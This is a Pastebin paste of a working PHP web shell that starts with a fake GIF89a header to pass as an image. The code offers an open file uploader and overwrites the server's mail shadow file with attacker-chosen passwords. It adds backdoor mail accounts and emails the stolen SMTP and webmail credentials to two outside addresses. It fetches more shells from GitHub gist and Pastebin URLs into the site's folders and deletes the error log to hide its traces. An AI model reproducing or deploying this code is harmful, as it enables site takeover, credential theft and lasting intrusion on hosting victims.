Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- GIF89a1
- GIF89a1
- <center>
- <?php
- echo '<center><h1>UPLOADER BY ./IzunaWeb & Madara</h1>'.'<br>'.'Uname : '.php_uname().'<br> Posisi : '.$cwd = getcwd(); Echo '<br><br><center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) { move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']); Echo "<script>alert('upload Done'); </script><b>DR SH3LL A FAIT SON BOULOT ;)</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; }
- @ini_set('output_buffering', 0);
- set_time_limit(0);
- ini_set('memory_limit', '64M');
- ini_set('max_execution_time',0);
- $ips = getenv('REMOTE_ADDR');
- $wr = 'infos:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
- hussam:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
- abi_layla:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
- accountmu:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
- adminustratro:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
- salesman:$1$Vo8rGyFv$eiXsGyV1rJIs3eP8VtvYV0:17784::::::
- ';
- $hm = 'infos:x:534:532::/home/$user/mail/$t/info:/home/$user
- hussam:x:534:532::/home/$user/mail/$t/hussam:/home/$user
- abi_layla:x:534:532::/home/$user/mail/$t/jancok:/home/$user
- accountmu:x:534:532::/home/$user/mail/$t/account:/home/$user
- adminustratro:x:534:532::/home/$user/mail/$t/t:/home/$user
- salesman:x:534:532::/home/$user/mail/$t/salesman:/home/$user
- ';
- $ports=array(25, 587, 465, 110, 995, 143 , 993);
- $primary_port='25';
- $user=get_current_user();
- $password='kontol87';
- $pwd = crypt($password,'$6$kontol87$');
- $t = $_SERVER['SERVER_NAME'];
- $t = @str_replace("www.","",$t);
- @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow');
- $ex=explode("\r\n",$passwd);
- @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.kontol87.bak');
- @unlink('/home/'.$user.'/etc/'.$t.'/shadow');
- foreach($ex as $ex){
- $ex=explode(':',$ex);
- $e= $ex[0];
- if ($e){
- $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
- echo '<center><span style=\'color:#00ff00;\'>'.$t.'|25|'.$e.'@'.$t.'|'.$password.'<br>';
- }}
- $c = fopen('/home/'.$user.'/etc/'.$t.'/passwd', 'a+');
- fwrite($c, $hm);
- fclose($c);
- $f = fopen('/home/'.$user.'/etc/'.$t.'/shadow', 'a+');
- fwrite($f, $wr);
- fclose($f);
- $parm = 'https://'.$t.':2096';
- $peli = 'D-nCtnVO%JNl';
- $kirim = '
- SMTP AUTO CREATE
- '.$t.'|25|'.$e.'@'.$t.'|'.$password.'
- --------------------------------------------
- '.$parm.' | infos@'.$t.' | ' .$peli.'
- '.$parm.' | hussam@'.$t.' | ' .$peli.'
- '.$parm.' | abi_layla@'.$t.' | ' .$peli.'
- '.$parm.' | accountmu@'.$t.' | ' .$peli.'
- '.$parm.' | adminustratro@'.$t.' | ' .$peli.'
- '.$parm.' | salesman@'.$t.' | ' .$peli.'
- ';
- header('Content-Type: text/html; charset=UTF-8');
- $tujuanmail = 'tampungan.bakdur@gmail.com,kefiex@hotmail.com';
- $x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
- $pesan_alert = "Wso - /wp-includes/js/include.php \n idbv2 - /wp-content/themes/anu.php \n uploader - /wp-admin/user/.wsa.php \r\n [ " . $_SERVER['SERVER_NAME'] . " ]";
- mail($tujuanmail, "Plugin Auto Wget", $pesan_alert, $kirim);
- function http_get($url){
- $im = curl_init($url);
- curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($im, CURLOPT_HEADER, 0);
- return curl_exec($im);
- curl_close($im);
- }
- $check1 = $_SERVER['DOCUMENT_ROOT'] . "/cache/include.php" ;
- $text1 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
- $open1 = fopen($check1, 'w');
- fwrite($open1, $text1);
- fclose($open1);
- if(file_exists($check1)){
- }
- $check2 = $_SERVER['DOCUMENT_ROOT'] . "/admin/anu.php" ;
- $text2 = http_get('https://gist.githubusercontent.com/obik87/fdaecaeda894cc9853ea53da1d1940fc/raw/92f687949dbf8a1ef37ef5e592fb8bfdde1a7ab3/waa');
- $open2 = fopen($check2, 'w');
- fwrite($open2, $text2);
- fclose($open2);
- if(file_exists($check2)){
- }
- $check3 = $_SERVER['DOCUMENT_ROOT'] . "/upload/.wsa.php" ;
- $text3 = http_get('https://pastebin.com/raw/BbcCvJ9S');
- $open3 = fopen($check3, 'w');
- fwrite($open3, $text3);
- fclose($open3);
- if(file_exists($check3)){
- }
- $check21 = $_SERVER['DOCUMENT_ROOT'] . "/+.php" ;
- $text21 = http_get('https://pastebin.com/raw/XewAB4M0');
- $open21 = fopen($check21, 'w');
- fwrite($open21, $text21);
- fclose($open21);
- if(file_exists($check21)){
- }
- unlink("error_log");
- ?>
Add Comment
Please, Sign In to add comment